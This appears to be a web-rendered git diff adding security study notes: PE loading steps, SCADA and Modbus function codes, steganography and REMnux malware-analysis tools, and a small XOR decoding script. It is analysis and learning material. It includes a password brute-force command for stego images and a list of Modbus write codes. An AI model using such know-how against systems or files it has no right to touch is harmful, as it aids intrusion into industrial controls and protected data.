* timestamp
|
||||
2. Section table details is parsed
|
||||
3. Content is mapped into memory based on
|
||||
* Entry point address and offset of ImageBase
|
||||
* Relative Virtual Address (RVA), addresses related to Imagebase
|
||||
4. Libraries and imports are loaded
|
||||
5. Entrypoint address of the main function is run
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Reverse Engineering References
|
||||
|
||||
|
||||
## Debugger
|
||||
|
||||
[scdbg](https://github.com/dzzie/SCDBG.git)
|
||||
|
|
@ -0,0 +1,35 @@
|
|||
# Supervisory Control and Data Acquisition (SCADA)
|
||||
|
||||
* SCADA works as an aggregatio of the following systems
|
||||
* __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
|
||||
* __Remote Terminal Unit (RTU)__, use for wide area telemetry
|
||||
* __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
|
||||
* __Communication network__
|
||||
|
||||
* Security is no first class citizen
|
||||
|
||||
## Modbus
|
||||
|
||||
* Developed by Modicon
|
||||
* Master/Slave, latter has an 8 bit address.
|
||||
* RS-485 Connector
|
||||
* Data registers 16 bit
|
||||
* Input register, 16 bit ro
|
||||
* Hold register, rw
|
||||
* Coil register, 1 bit rw
|
||||
* Discrete register, 1bit ro
|
||||
|
||||
### Function Codes
|
||||
* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
|
||||
* RTU request inside of TCP segments, port 502
|
||||
|
||||
* 1 __Read Coil__
|
||||
* 2 __Read Discrete Input__
|
||||
* 3 __Read Holding Registers__
|
||||
* 4 __Read Input Registers__
|
||||
* 5 __Write Single Coil__
|
||||
* 6 __Write Single Holding Register__
|
||||
* 15 __Write Multiple Coils__
|
||||
* 16 __Write Multiple Holding Registers__
|
||||
|
||||
|
|
@ -0,0 +1,2 @@
|
|||
# Outguess
|
||||
`man outguess`
|
|
@ -0,0 +1,10 @@
|
|||
# Steganography Tools
|
||||
|
||||
[Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git)
|
||||
[OutGuess](https://github.com/resurrecting-open-source-projects/outguess)
|
||||
[Remnux Docs](https://docs.remnux.org/)
|
||||
[Steghide](http://steghide.sourceforge.net/)
|
||||
[Stegbrute](https://github.com/R4yGM/stegbrute)
|
||||
[stegoVeritas](https://github.com/bannsec/stegoVeritas)
|
||||
[zsteg](https://github.com/zed-0xff/zsteg)
|
||||
|
|
@ -0,0 +1,24 @@
|
|||
# ReMnux
|
||||
* [Documentation](https://docs.remnux.org/)
|
||||
|
||||
## Tools
|
||||
|
||||
### Peepdf
|
||||
* Extracting JS from PDF using config file into `js_from_pdf.js`
|
||||
```sh
|
||||
echo 'extract js > js_from_pdf.js' > extract_js.conf
|
||||
peepdf -s extract_js.conf <file.pdf>
|
||||
```
|
||||
|
||||
### vmonkey
|
||||
* Detects malicious VBasic code in documents.
|
||||
```sh
|
||||
vmonkey <file.doc>
|
||||
```
|
||||
|
||||
### Packaged Binaries
|
||||
* Can be identified via entropy or loaded libs
|
||||
* The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`.
|
||||
* [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers.
|
||||
* File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high.
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
# Stegbrute
|
||||
Bruteforce stego jpegs with a password.
|
||||
|
||||
* install via `cargo install stegbrute`
|
||||
|
||||
## Usage
|
||||
```sh
|
||||
stegbrute -f <filename> -w <wordlist>
|
||||
```
|
|
@ -0,0 +1,8 @@
|
|||
# Steghide
|
||||
|
||||
* JPGs only
|
||||
|
||||
* Example
|
||||
```sh
|
||||
steghide extract -sf jpeg1.jpeg
|
||||
```
|
|
@ -0,0 +1,15 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
def xor(data, key):
|
||||
keylen = len(key)
|
||||
return bytearray((
|
||||
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
|
||||
))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
data = bytearray(open('topsecret.txt', 'rb').read())
|
||||
key = b'key'
|
||||
res = xor(data, key)
|
||||
print(res.decode())
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
# Stegoveritas
|
||||
|
||||
* Install via `pip install stegoveritas` and `stegoveritas_install_deps`
|
|
@ -0,0 +1,8 @@
|
|||
# zsteg
|
||||
|
||||
* PNGs, BMPs
|
||||
|
||||
* Example
|
||||
```sh
|
||||
zsteg png1.png --strings all
|
||||
```
|
Loading…
Reference in New Issue